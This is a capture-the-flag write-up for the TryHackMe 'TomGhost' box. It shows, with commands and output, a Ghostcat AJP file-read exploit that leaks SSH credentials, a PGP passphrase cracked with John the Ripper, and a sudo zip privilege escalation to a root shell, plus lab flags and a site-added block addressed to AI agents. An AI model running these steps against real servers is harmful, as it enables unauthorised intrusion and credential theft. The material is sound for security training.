# TomGhost

## Scanning

### Nmap

```
root@kali:~# nmap -T4 -p- -A -sV $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-20 15:34 UTC
Nmap scan report for ip-10-10-65-241.eu-west-1.compute.internal (10.10.65.241)
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:63:0C:81:BC:59 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms ip-10-10-65-241.eu-west-1.compute.internal (10.10.65.241)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
```

## Enumeration

### port 8080

tomcat server landing page

nothing interesting after directory busting 

### port 8009

8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)

**ajp13**  is vulnerable to **LFI**

here is the exploit [**Exploit-db**](https://www.exploit-db.com/exploits/48143)

```
root@kali:~# python ex.py 10.10.0.41
Getting resource at ajp13://10.10.0.41:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
```

Credentials `skyfuck:8730281lkjlkjdqlksalks`

## Initial Access

### ssh

```
skyfuck@ubuntu:~$ ls /home
merlin  skyfuck
skyfuck@ubuntu:~$ cat /home/merlin/user.txt 
THM{GhostCat_1s_so_cr4sy}
```

* [x] User Shell

Looking at skyfuck’s home directory we can see a *credential.pgp* and we know from the box tags that this appears to be part of the challenge. We can also see tryhackme.asc which is the PGP private key block.

## Privilege Escalation

### Horizontal Escalation

lets extract passphrase from tryhackme.asc

* extract hash

```
root@kali:~/hashed# /usr/sbin/gpg2john tryhackme.asc > hash
```

* brute force it

```
root@kali:~/hashed# /usr/sbin/john hash -wordlist=/usr/share/wordlists/rockyou.txt/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2021-09-20 19:11) 8.333g/s 8933p/s 8933c/s 8933C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

passphrase `alexandru`

* decrypt *credential.pgp*

```
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jskyfuck@ubuntu:~$ 
```

Credentials `merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j`

```
skyfuck@ubuntu:~$ su merlin 
Password: 
merlin@ubuntu:$
```

* [x] User Shell

### Vertical Escalation

```
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
```

we can run /usr/bin/zip with NOPASSWD

[zip | GTFOBins](https://gtfobins.github.io/gtfobins/zip/#sudo)&#x20;

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-Mk3RY3W4vbGi0_HQg2h%2F-Mk3k5nSMwZXw-9qLN-X%2Fimage.png?alt=media\&token=3c816c4f-98b5-4a75-88c9-e64418af9336)

```
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{Z1P_1S_FAKE}
```

* [x] Root Shell


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xa1mn.gitbook.io/writeups/try-hack-me-thm/linux-boxes/tomghost.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.